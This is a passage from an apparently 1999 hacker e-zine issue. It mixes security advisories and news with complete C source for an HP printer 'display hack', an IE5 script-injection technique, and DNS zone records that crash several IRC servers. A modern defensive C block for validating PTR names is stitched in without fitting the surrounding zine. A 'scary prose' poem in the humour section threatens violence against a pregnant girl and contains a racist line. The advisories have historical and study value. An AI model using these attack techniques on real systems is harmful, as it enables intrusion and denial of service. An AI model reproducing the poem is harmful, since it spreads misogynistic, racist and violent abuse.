SysAdmin, Developer, Samba Team Member

@HWA

72.0 Finjan exploit alert
~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

Finjan Software, Inc.
Malicious Code Exploit Alert

Finjan customers and partners,

There is a recent Trojan executable you should be aware of called WinNT.Infis. Through Finjan's proactive "sandbox" technology, executable files such as WinNT.Infis are monitored and blocked on the first attack. By watching for violations of security policies, Finjan's SurfinShield Corporate protects desktop and network computers from attacks by this Trojan executable, as well as new variants of this malicious program, without requiring users to download any software patch or anti-virus pattern update.

WinNT.Infis is yet another example of Trojan executables that are appearing more frequently. Please take proper precautions to educate and protect your corporation and employees.
---------------------------------------------------------------
WinNT.Infis Trojan Executable
---------------------------------------------------------------

OVERVIEW

WinNT.Infis is an executable file with .EXE extension that installs itself as a native Windows NT system driver. It is the first known malicious program to install and run in Kernel mode under Windows NT. That is, WinNT.Infis runs in the most sensitive part of the Windows NT operating system.

There has been speculation about the creation of a Windows NT driver attack, but most experts believed that such an attack was at least one or two years in the future. WinNT.Infis has made theory into reality much sooner than expected. The WinNT.Infis Trojan is capable of infecting any executable file (program) on the fly from Kernel mode.

TECHNICAL DESCRIPTION

Infis is a 32-bit Windows executable file that infects other Windows executables. When the Trojan is executed, it creates the HKLM\SYSTEM\CurrentControlSet\Services\inf entry in the Windows NT registry and creates the system file INF.SYS in the \WINNT\SYSTEM32\DRIVERS directory. The INF.SYS file is a native Windows NT driver and is 4608 bytes.

When the system is rebooted the altered driver (INF.SYS) is loaded automatically. This way the Trojan will be able to replicate to accessed executable files on the fly. The Trojan replicates to Windows executable applications that have .EXE extensions. The Trojan does not infect CMD.EXE and is unable to infect read-only files.

However, the Trojan has to be executed by an Administrator equivalent user. Without such a right the code is unable to replicate because, despite running in the kernel, it does not have a User mode replication component.
HOW TO PROTECT YOURSELF

Finjan's SurfinShield Corporate (http://www.finjan.com/products_home.cfm) will protect users from ALL variants of this Trojan as well as new Trojan executables through its proactive run-time monitoring technology that "sandboxes" executables saved on PCs and blocks any executable that violates a security policy. Updated pattern databases from anti-virus vendors will block this version of WinNT.Infis.exe.

ADDITIONAL INFORMATION

InfoWorld story (Oct. 8, 1999):
http://www.infoworld.com/cgi-bin/displayStory.pl?99108.enntvirus.htm

----------------------------------------------------------------------
PRIVACY AND UNSUBSCRIBE NOTICE

Finjan Software respects your right to online privacy. If you do not wish to receive news or alert e-mails from us, simply reply to this e-mail at: finjan@usmail.finjan.com and type "unsubscribe" in the "subject" field.

@HWA

73.0 Hybrid network cablemodems
~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

KSR[T] Security Advisories
http://www.ksrt.org

Contact Account: ksrt@ksrt.org
Advisory Subscription: Send an empty message to: ksrt-advisories-subscribe@ksrt.org

----

KSR[T] Advisory #012
Date: Oct. 6 1999
ID #: hybr-hsmp-012

Affected Program: Hybrid Network's Cable Modems

Author: David Goldsmith

Summary: Remote attackers can anonymously reconfigure any Hybrid Network's cable modem that is running HSMP. This can be used to steal information and login/password pairs from cable modem users.

Problem Description:

Hybrid Network's cable modems can be configured via a UDP based protocol called HSMP. This protocol does not require any authentication to perform configuration requests. Since UDP is easily spoofed, configuration changes can be made anonymously.

Compromise:

There are a plethora of denial of service attacks involving bad configuration settings (ethernet interfaces set to non-routable IP addresses, et al).
HSMP can also be used to configure the DNS servers used by cable modem users, allowing attackers to redirect cable modem subscribers to a trojan site.

More complex and theoretical attacks could involve the running of actual code through the debugging interface. This might allow remote attackers to deploy ethernet sniffers on the cable modem.

Notes:

KSR[T] found this vulnerability in parallel with Paul S. Cosis and the l0pht. We would like to thank them for their input to this advisory.

Patch/Fix:

Cable providers should block out HSMP traffic (7777/udp) on their firewalls.

Links:

KSR[T] had initially written a demonstration HSMP client which is located at:
http://www.ksrt.org/ksrt-hsmp.tar.gz

There is also another HSMP client located at:
http://www.larsshack.org/sw/ccm/

l0pht modified the above client and added the ability to spoof the source address, allowing for the anonymous reconfiguration of Hybrid cable modems. Their client is located at:
http://c0re.l0pht.com/~sili/ccm-spoof.tar.gz

@HWA

74.0 HP Printer display hack (source code)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www3.l0pht.com/~sili/hp.c

/*
 * HP Printer Hack
 * 12/8/97
 * sili@l0pht.com
 *
 * Compile with -lsocket -lnsl on solaris.
 * Should compile fine on *BSD & linux.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 9100

int main (int argc, char *argv[])
{
    int sockfd, bytes_sent;            /* Sock FD */
    struct hostent *host;              /* info from gethostbyname */
    struct sockaddr_in dest_addr;      /* Host Address */
    char line[100];

    if (argc != 3) {
        printf("HP Display Hack\n--sili@l0pht.com 12/8/97\n\n%s printer \"message\"\n", argv[0]);
        printf("\tMessage can be up to 16 characters long (44 on 5si's)\n");
        exit(1);
    }

    if ((host = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(1);
    }

    printf("HP Display hack -- sili@l0pht.com\n");
    printf("Hostname: %s\n", argv[1]);
    printf("Message: %s\n", argv[2]);

    /* Prepare dest_addr */
    dest_addr.sin_family = host->h_addrtype;   /* AF_INET from gethostbyname */
    dest_addr.sin_port = htons(PORT);          /* PORT defined above */
    bcopy(host->h_addr, (char *)&dest_addr.sin_addr, host->h_length);
    bzero(&(dest_addr.sin_zero), 8);           /* Take care of sin_zero ??? */

    /* Get socket */
    /* printf ("Grabbing socket....\n"); */
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        exit(1);
    }

    /* Connect! */
    printf("Connecting....\n");
    if (connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1) {
        perror("connect");
        exit(1);
    }

    /* Preparing PJL command: the message goes into the RDYMSG DISPLAY string */
    strcpy(line, "\033%-12345X@PJL RDYMSG DISPLAY = \"");
    strncat(line, argv[2], 44);
    strcat(line, "\"\r\n\033%-12345X\r\n");

    /* Sending data! */
    /* printf ("Sending Data...%d\n",strlen(line)); */
    /* printf ("Line: %s\n",line); */
    bytes_sent = send(sockfd, line, strlen(line), 0);
    printf("Sent %d bytes\n", bytes_sent);

    close(sockfd);
    return 0;
}

@HWA

75.0 Omni-NFS/X Enterprise version 6.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

Faulty software
---------------
Omni-NFS/X Enterprise version 6.1

Product
---------
Omni-NFS/X Enterprise is an X and NFS server solution for win32 systems. It is written by XLink Technology ( http://www.xlink.com ).
Vulnerability
-------------
The nfs daemon ( nfsd.exe ) used by Omni-NFS/X will jump to 100% cpu usage if you scan it using nmap with either the -O (OS detect) or the -sS ( TCP SYN (half open) ) option.

Example:

(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1007) $ nmap -O -p 111 slacky

Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on slacky (192.168.1.2):
Port    State       Protocol  Service
111     open        tcp        sunrpc

TCP Sequence Prediction: Class=trivial time dependency
                         Difficulty=2 (Trivial joke)
Remote operating system guess: Windows NT4 / Win95 / Win98

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1008) $

This was tested on Microsoft Windows NT 4.0 Workstation with SP5. I'm pretty sure all their NFS solutions are affected by this.

------------------------------------------------
Sacha Faust
sfaust@isi-mtl.com

"He who despairs of the human condition is a coward, but he who has hope for it is a fool." - Albert Camus

@HWA

76.0 More IE5 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~

IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is vulnerable) allows reading local files, text and HTML files from any domain and probably window spoofing (have not tested window spoofing but believe it is possible). It is also possible in some cases to read files behind a firewall.

Details:
The problem is the combination of IFRAME and document.execCommand. Normally, you cannot use execCommand on an IFRAME from another domain. But if you do: "IFRAME.focus(); document.execCommand" then the command will be executed in the IFRAME (some commands do not work in this way, but some do and that is enough).
So, we create an IFRAME with SRC="file://c:/test.txt" and inject JavaScript code in it. When the JavaScript code is executed, it is executed in the security context of the IFRAME - the "file:" protocol.

The injection is done using the "InsertParagraph" command (guess other commands will do) which sets the ID of the paragraph. But if you place a " in the ID, then a STYLE tag may be inserted also. The JavaScript code is injected using the STYLE tag: STYLE="left:expression(eval(JSCode))"

This vulnerability may be exploited using HTML email message or a newsgroup posting.

The code is:
----------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------

Workaround: Disable Active Scripting

Demonstration is available at http://www.nat.bg/~joro/execcommand.html

Regards,
Georgi Guninski
http://www.nat.bg/~joro

-=-

The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox.

********************************
Microsoft Security Bulletin (MS99-040)
--------------------------------------

Patch Available for "Download Behavior" Vulnerability

Originally Posted: September 28, 1999
Updated: October 08, 1999

Summary
=======
On September 28, 1999, Microsoft released the original version of this bulletin, in order to provide a workaround for a security vulnerability in Microsoft(r) Internet Explorer 5 that could allow a malicious web site operator to read files on the computer of a person who visited the site. Microsoft has completed a patch that completely eliminates the vulnerability, and has re-released this bulletin in order to advise customers of its availability.

Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-040faq.asp.

Issue
=====
IE 5 includes a feature called "download behavior" that allows web page authors to download files for use in client-side script. By design, a web site should only be able to download files that reside in its domain; this prevents client-side code from exposing files on the user's machine or local intranet to the web site. However, a server-side redirect can be used to bypass this restriction, thereby enabling a malicious web site operator to read files on the user's machine or the user's local intranet. This vulnerability would chiefly affect workstations that are connected to the Internet.

Affected Software Versions
==========================
- Microsoft Internet Explorer 5

Patch Availability
==================
The patch is available for download at either of the following locations
- http://windowsupdate.microsoft.com
- http://www.microsoft.com/msdownload/iebuild/dlbhav/en/dlbhav.htm

More Information
================
Please see the following references for more information related to this issue.
- Microsoft Security Bulletin MS99-040: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/ms99-040faq.asp.
- Microsoft Knowledge Base (KB) article Q242542, "Download Behavior" Vulnerability in Internet Explorer 5, http://support.microsoft.com/support/kb/articles/Q242/5/42.asp. (Note: It may take 24 hours from the original posting of this bulletin for this KB article to be visible.)
- Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp.

Obtaining Support on this Issue
===============================
Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp.

Acknowledgments
===============
Microsoft acknowledges Georgi Guninski for bringing this issue to our attention.

Revisions
=========
- September 28, 1999: Bulletin Created.
- October 08, 1999: Bulletin updated to announce availability of patch.

-----------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.

*******************************************************************
You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like.

For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security.
@HWA

77.0 Gov-boi dies in a car crash?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.hack.co.za

Well known and liked on irc (and in #ninjachat) aka Insanity/gov-boi sadly died in a car crash this weekend...he ran the site www.hack.co.za which was popular for its '0day' exploit releases

This is a hot issue I've been fed so much bullshit regarding this story that its not funny. if its true, our condolences

The site reads;

I regretfully announce the sad loss of the owner of www.hack.co.za due to an unfortunate incident. He was involved in a car accident which claimed his life about 2 hours ago. His loss is a tragedy and his security expertise will be greatly missed by all who knew him. He was known on irc as gov-boi or hotmetal. On a personal note.. I would like to pass on our personal condolences to the members of his family..

++Matthew Pieterson.
matthew@hack.co.za

The above was written before I found out it was a hoax and even made it onto Hackernews.com (sorry guys) I was fed false info, I wasn't the only one that fell for this macabre joke, deepquest and mosthated also mailed hackernews with the story.... live and learn.

Now the punchline, this was all an elaborate hoax played out by gov-boi who is very much alive.
The idea was to be a 'ghost hacker' for halloween so he took it one step further and faked his death....hope this doesn't taunt fate =)s

@HWA

78.0 "Secret" Nokia phone codes
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From the "Its here coz I have a nokia dept". =) - Ed

If anyone has codes for the 2190e or 51xxx series send em in!!! i'd be much appreciative some of these codes work for my phone although are designated for others. - Ed

Source: http://www.nokiaphonefunsite.freeserve.co.uk/secretcodes.html

To find out the IMEI number of your phone press: * # 06 #
To find software version information press: * # 0000 # or * # 9999 #
To find out about your phone's Warranty, press: *#92702689# or *#92772689#

In this menu there are several options:

IMEI (International Mobile Equipment Identification)
Made MM/YY (date of production of the phone mm/yy)
Purchasing Date (You can edit the Purchase Date here ; you cannot undo the changes once edited)
Repaired (date of repair, if there was one)
Transfer user data

To activate EFR after phone reboot: *3370#
To deactivate EFR after phone reboot: #3370#
To activate HFR after phone reboot: *4720#
To deactivate HFR after phone reboot: #4720#

Note: EFR (Enhanced Full Rate) and HFR (Half Full Rate) are only available on Orange and One2One Precept customers. Both increase call quality at the expense of battery life. EFR does this more so than HFR. If you are with Orange, it is likely that EFR is already activated.

I haven't tried these, so I'm not sure if they work or not. If you know any codes for Nokia phones yourself, please don't hesitate to let me know.

@HWA

79.0 Realnetworks snooping?
~~~~~~~~~~~~~~~~~~~~~

From Dragos Ruiu

RealNetworks has been surreptitiously gathering behavioral data from their jukeboxes. Seems significant to me. What -does- doubleclick do?

--dr

http://www.wired.com/news/reuters/0,1349,32244,00.html

Real Snooping by RealNetworks
Reuters
8:35 a.m. 1.Nov.1999 PST

RealNetwork's RealJukebox software monitors user listening habits and other activities, then sends the information and the user's identity to the company, The New York Times said.

A security expert intercepted and examined information generated from the program, and company officials acknowledged that RealJukebox gathers information on what users are playing and recording, the Times said.

RealJukebox is used to play compact discs on computers and can copy music to a user's hard drive and download music from the Internet.

Dave Richards, RealNetworks' vice president for consumer products, told the Times the company gathered the information to customize service for individual users. He and other company officials said the practice did not violate consumer privacy because the data was not stored by the company or released to other companies.

But privacy advocates and security experts agreed that it was a violation of the privacy of the 13.5 million registered users of RealJukebox, the Times said, particularly because RealNetworks has not informed consumers they are being identified and monitored.

Richard Smith, an independent security consultant, said RealNetworks tracks the numbers of songs stored on a user's hard drive, the kind of file formats in which the songs are stored, the user's preferred genre of music, and the type of portable music player, if any, the user has connected to the computer.

In addition, a personal serial number known as a globally unique identifier, or GUID, is also sent to RealNetworks, the paper said.

The fact that RealNetworks gathers the information is not mentioned in the privacy policy posted on its Web site, the Times said, or the licensing agreement users must approve when installing RealJukebox.

Copyright 1999 Reuters Limited.

@HWA

80.0 Copying DVD's? DVD Encryption broken
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DVD Piracy: It Can Be Done
by Andy Patrizio
1:20 p.m. 1.Nov.1999 PST

The worst fear of movie studios has been realized: DVD movie encryption has been broken.

A utility called DeCSS is currently floating around on the Net that will read a DVD movie disc and save the file on a hard disk, minus the encryption. All that's required is a DVD-ROM drive -- since CD-ROM drives can't read the 4.7GB DVD movie discs -- and a lot of disc space. The faster the CPU, the faster it will process the file. It takes around 10 minutes to process a .VOB file on a 500MHz Pentium III.

The hack opens up illicit online trading of DVD movies, although minus DVD-ROM's interactive elements and outstanding audio/visual quality.

The utility, written by two European programmers requesting anonymity, uses DVD playback code found in software-based DVD playback utilities, like WinDVD, ATI DVD from ATI Technologies, and XingDVD. Every player has a DVD copy protection decoder for playback, just like the hardware decoder in DVD players from Toshiba, Sony, and other consumer electronics devices.

One programmer who examined DeCSS said the utility emulates that same playback code. But instead of displaying the video and audio to screen, it simply saves it back to the disk without encryption, since there is no encryption in playback.

"The bottom line is, if you have a decoder, it has to execute somewhere. And that's always been the weak link, where you can get at the encrypted material," said David Moskowitz, president of Productivity Solutions, from King of Prussia, Pennsylvania.

Getting the decryption code, as it turns out, is relatively easy. Using an in-circuit emulator -- a device used to monitor hardware activity -- Moskowitz was able to watch exactly what the DVD hardware does in decrypting the movie on his PC. "With that information, it's no big deal to create the [cracking] application," he said.

One programmer who had a peripheral involvement in DeCSS development thinks piracy from this utility is a non-issue.

"There have been DVD ripping tools available for months," said Derek Fawcus, a programmer in England. "Among the things you can find are explicit instructions and software for making VCD copies of DVDs. DeCSS is simply the latest in a line of methods of doing this."

Some of the DVD decoder assembler code was released on the Internet, and Fawcus rewrote it in C code. That code was later used in DeCSS.

Once decrypted, the DVD movie files, which have a .VOB extension, are too big to fit on a CD-ROM. Most .VOB video files are 1 GB in size, and a movie will be in three or four files. But there are many DVD conversion utilities floating around on DVD ripping sites, like DVDigest. It has conversion tools, like DVD2MPG and VOBSplit, which can be used to convert a DVD movie into VCD format, which can fit on a CD-ROM disc. There are even sites dedicated to converting DVDs to VCD format.

This means losing the interactivity of DVD-ROM and its tremendous sound and video quality, but it also means VCDs can be played on CD-ROM drives. It also makes it easier to trade the movie online.

Movie piracy has been a growing problem on the Internet, with films traded in MPEG and AVI format via Web sites and private file transfer sites. Movies in MPEG format are around 600 MB in size.

DVD supporters are not thrilled by the development. "It was like pulling teeth to get the major studios to all commit to standard DVD in the first place," said Jeff McNeil, webmaster of The Big Picture, a home theater enthusiast site. "I consider this a disturbing development and only hope that it doesn't curtail studio commitment to DVD as we know it today."
@HWA

81.0 Elite irc falls
~~~~~~~~~~~~~~~

----- Original Message -----
From: Goblin
To:
Sent: Friday, October 29, 1999 6:56 AM
Subject: DoS attack for ircd's by oversized PTR record

(Read, 1st - Some domains and IP's listed here were substituted by fake ones, by their owners desire, but the examples are 100% true, and really tested)

I found this "bug" while trying to make a BIG sub-domain on my name server, what i just did was on my named.conf put:

A.fccn.deve.estar.enganada.este.e.que.deve.ser.o.maior.nome.de.uma.maquina.em.portugal IN A 111.111.111.111
111.111.111.111.in-addr IN PTR A.fccn.deve.estar.enganada.este.e.que.deve.ser.o.maior.nome.de.uma.maquina.em.portugal.xxxxxxx.pt.

Changed the serial and did named.restart checked for it (if it's working or not).

nslookup
Default Server:  ptm-1.xxxxxxx.pt
Address:  111.111.111.2

> 111.111.111.111
Server:  ptm-1.xxxxxxx.pt
Address:  111.111.111.2

Name:    A.fccn.deve.estar.enganada.este.e.que.deve.ser.o.maior.nome.de.uma.maquina.em.portugal.xxxxxxxx.pt
Address:  111.111.111.111

Well it was working, i now had a ip <-> name (resolving ip)

So i decided to go to a Portuguese irc network (irc.ptlink.net), to my amaze the server crashed (only the ircd) when trying to resolve my ip, i tried another server and got the same result. I did some more checking and found it to be vulnerable, it was running Elite.PTlink3.3.1 a modified version of Elite ircd's.

I probed around for another ircd software and i found another network running u.2.9.32 (a undernet ircd) tried it and found it to be also vulnerable.

Continuing i tried it on Ptnet version PTnet1.5.39F which is based on Dalnet's ircd's and found it to NOT be vulnerable, when i connected it tried to resolve my ip and failed, but it didnt crash, it continued the connection normally.

So let me put this on a small list of affected IRCd's.
Vulnerable:
Elite ircd (versions unknown)
Ptlink ircd (all versions)
Undernet ircd (u.2.9.32)

Not vulnerable:
Ptnet (versions unknown and 1.5.39F)

(Note that this DoS could be applied for many other things)

Any questions about this DoS in ircd's please mail me if a valid request i would be glad to help.

Pedro Reis ( Goblin ) @ Portugal (irc.ptlink.net)

@HWA
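The defensive side of the PTR problem above, as an added example that is not code from Goblin's post or from any of the ircds named: a reverse-lookup name is checked against the DNS label limit and against the fixed hostname buffer before it is stored, and on any failure the server keeps the numeric address and carries on, which is how the non-vulnerable PTnet server in the post behaved. HOSTLEN = 63, the function names and the sample name built from the post's record are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed limits, not taken from the post: RFC 1035 caps one DNS label at
 * 63 octets; HOSTLEN stands in for the fixed per-client hostname buffer a
 * C ircd keeps (63 is an assumed value). */
#define DNS_LABEL_MAX 63
#define HOSTLEN       63

enum ptr_status {
    PTR_OK = 0,
    PTR_EMPTY,      /* NULL or "" */
    PTR_BAD_LABEL,  /* empty label ("a..b") or a label over 63 octets */
    PTR_BAD_CHAR,   /* anything outside letters, digits, '-' and '.' */
    PTR_TOO_LONG    /* well-formed, but longer than the buffer it goes into */
};

/* Check a name returned by a reverse (PTR) lookup before it is stored.
 * A trailing dot (FQDN form, as in the zone file above) is accepted. */
enum ptr_status validate_ptr_name(const char *name)
{
    const char *p;
    size_t label = 0, len;

    if (name == NULL || name[0] == '\0')
        return PTR_EMPTY;

    for (p = name; ; p++) {
        if (*p == '.' || *p == '\0') {
            if (label == 0 || label > DNS_LABEL_MAX)
                return PTR_BAD_LABEL;
            label = 0;
            if (*p == '\0' || p[1] == '\0')   /* end of name or trailing dot */
                break;
        } else if (isalnum((unsigned char)*p) || *p == '-') {
            label++;
        } else {
            return PTR_BAD_CHAR;
        }
    }

    /* Structure is fine; the only remaining question is whether it fits. */
    len = strlen(name);
    if (name[len - 1] == '.')
        len--;                                /* the trailing dot is not stored */
    return len > HOSTLEN ? PTR_TOO_LONG : PTR_OK;
}

/* Store the client's hostname, failing closed. The crash-prone pattern this
 * replaces is an unchecked strcpy() of the resolver's answer into a
 * HOSTLEN-sized array. On any validation failure the dotted-quad address is
 * kept instead, so the connection proceeds without the name. */
enum ptr_status set_client_host(char *dst, size_t dstlen,
                                const char *resolved, const char *ip)
{
    enum ptr_status st = validate_ptr_name(resolved);
    const char *src = (st == PTR_OK) ? resolved : ip;
    size_t n = strlen(src);

    if (dstlen == 0)
        return st;
    if (st == PTR_OK && n > 0 && src[n - 1] == '.')
        n--;                                  /* canonical form, no trailing dot */
    if (n >= dstlen)                          /* the fallback string must fit too */
        n = dstlen - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return st;
}

/* Constructed from the record in the post, with the mail line-wrap joined. */
const char OVERSIZED_PTR_NAME[] =
    "A.fccn.deve.estar.enganada.este.e.que.deve.ser.o.maior.nome.de.uma."
    "maquina.em.portugal.xxxxxxxx.pt";

int main(void)
{
    char host[HOSTLEN + 1];
    enum ptr_status st = set_client_host(host, sizeof host,
                                         OVERSIZED_PTR_NAME, "111.111.111.111");
    /* prints: status=4 stored="111.111.111.111" */
    printf("status=%d stored=\"%s\"\n", (int)st, host);
    return 0;
}
```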
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous...

So, you want a puzzle do you? well crack the 'code' at the beginning and end of the newsletter only one person has done it so far, so go ahead get your crypto sk1llz out and try cracking it. its easy!
[ASCII art banner: "Send in your Ascii Art"] TOO, for inclusion in future issues

Do the HWA logo etc and we'll showcase it here to show off your talents...remember the 80's? dig out those ascii editors and do yer best...

[ASCII art: HWA logo]

[ASCII art: "HAX0R FOR HIRE ... WILL HACK FOR NUDE PICS OF SARAH MICHELLE GELLER! (BUFFY)" cartoon (Ascii art from V0iD magazine #7)]

Buffer Overflow Found in Instant Lunch

From HNN http://www.hackernews.com/
contributed by Dr. Mudge

A very large and serious security issue has been uncovered involving a buffer overflow with Maruchan's Instant Lunch. Instant Lunch is a dried soup product relied on by many people for nourishment. If the documentation for its use is followed a possible buffer overflow may result seriously injuring the user. Other products, such as Cup O Noodles, may also be affected.
Instant Lunch Advisory
http://legions.org/~optik/ins_advise.txt

Advisory: Buffer Overflow in Instant Lunch
Author: optiklenz
legions.org/~optik
Contact: optik@shockimaging.com optik@legions.org

"At two minutes and thirty seconds the darn thing overflows"

Overview:

"As a [hot] snack or delicious meal-anytime"

I came home and was hungry, and had to get to work right away so I popped an Instant Lunch in the microwave the end results will shock you!. The cover of Maruchan's Instant Lunch says ready in 3 minutes. that is definitely not the case. Upon completing extensive research I found that during the second minute Instant Lunch is susceptible to a buffer overflow.

The directions on the back are as follows:

1. Fold back lid half way. fill to inside line with "boiling" water
2. Close lid "securely" and let stand 3minutes.
3. Remove lid, stir and enjoy from cup.

There is absolutely no truth in the above process, and I have written Maruchen himself, and have asked him to re-write the instructions on how to prepare the noodles. My remarks on their directions below:

1. If the waters already boiled why would they put the Instant lunch in the microwave?! HUH? HUH? This is clearly an error on your part.
2. During my research I found that even placing a metal object on top of my Instant Lunch didn't keep the water from overflowing once it hits the two and a half minute mark. It did however start shooting sparks off everywhere. I will have to investigate this some more.
3. "enjoy" Yes enjoy a nice mess... (assholes).. I'm sorry I didn't mean to call you assholes it's just sometimes I get emotional over certain topics.

Remotely Overflowing the Water:

My microwave has a USB port so I was able to create an application that would control the microwave from a computer in my room.
Example:

[darkone] ps -aux
microwave 3 0.0 0.5 1692 948 pts/3 S 19:23 0:00 - instant_lunchd
[darkone] ./instant_lunch microwave offset 31337 Total_Fat 12g
\x8d\x5e\x17 0:3/0; 8/FF; F/'b1100X1X0;.../micro/
Water overflowed....

This seems to effect Cup O Noodles too, but I'll have to do more testing.

The versions of Instant Lunch I've tested thus far are

Roast Beef Flavor
Chicken Vegetable Flavor
Creme of Chicken Flavor
California Flavor

Solution:

There is currently no patch or fix for this overflow. There is however a fix for remote attacks. Simply comment out microwave services in inetd.conf.

----------------------------------------------------
optiklenz was Interviewed by Bob Mathers of the Daily Food.
------------------------------------------------------

so what do you say to the vendors that make these seemingly wholesome food products.

Well Bob I say that had they done proper testing we'd have much more happy noodle eaters.

Is this a high risk?

Your damn skippy Bob. I mean innocent people are being hurt by the hot water that spews from these poor excuses of a lunch time meal. It's also painful to see people traumatized by the lack of flavor that is expected in every bite do to some of it escaping with the overflow.

How big is the problem

As far as I know this is an international incident. I did a study and apparently 90% of these food products are vulnerable to this overflow. People everywhere eat Instant Lunch... china, iraq, yogoslavy

People like you should be rewarded for your research yet you do this for free am I correct?

It's all apart of making this world a safer place Bob. I mean If I don't let people know about these serious issues someone can maliciously buffer overflow someone's food. Their only source of nutrition. People are dying Bob!

Well there you have it folks.. optiklenz.. A hacker a hero. A modern day saint. That's all we have for tonight.
Tune in next time when we'll bring you an inside look at how cows are slaughtered with a special guest appearance from the cDc.

OPTIK FOR PRESIDENT IN 2000

Scary prose from the underground ...

[ASCII art: SFS logo]

SiCK FUCK SQUAD ! Mindfuckin' you since 1999 !

TiTLE: kids
AUTHoR: Max0r
!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!-!

whoops, you wanted me to pull out?
quiet bitch, don't scream and shout!
You can get an abortion, so chill
it's not hard for cum to spill
Hell no you aint keeping the baby
you're dad will shoot me, there's no maybe.
if you have that kid i'll kill you both
trust me, shotguns stunt your growth
don't cry, theres a simple solution
run away, so I don't face prosecution
maybe you could smoke alot of crack
that way your dad thinks the father was black
don't end up like that bitch rhonda
she got run over by a two door honda
listen bitch i gotta run
I DONT WANT NO FUCKING SON!!!

~EOF

-------------------=====-------
want to contribute? think your fucked up enough? sfsquad@yahoo.com

@HWA

SITE.1

http://www.hack.co.za/

You can Send in submissions for this section too if you've found (or RUN) a cool site...

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist.

>Start<

Last week attrition took a bit of a vacation but they're back with more defacements listed below; We've come across the first Microsoft defacement we've ever recorded. As you know we've scoured through some of the top mirrors to ensure Attrition's historic accuracy (http://www.attrition.org/mirror) and none of those included a Microsoft defacement either:

Lots of .gov and .mil servers have been hit this week, looks like people have been active playing with fire... lets hope this doesn't bring down a whole new hacker witch hunt from the feds. - Ed

Defaced domain: www.redcrossblood.org
Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/www.redcrossblood.org
Defaced by: hacking for ponies
Operating System: Solaris

Defaced domain: www.westmount.cx
Mirror: http://www.attrition.org/mirror/attrition/1999/10/31/www.westmount.cx
Defaced by: sh0rt and GBMP
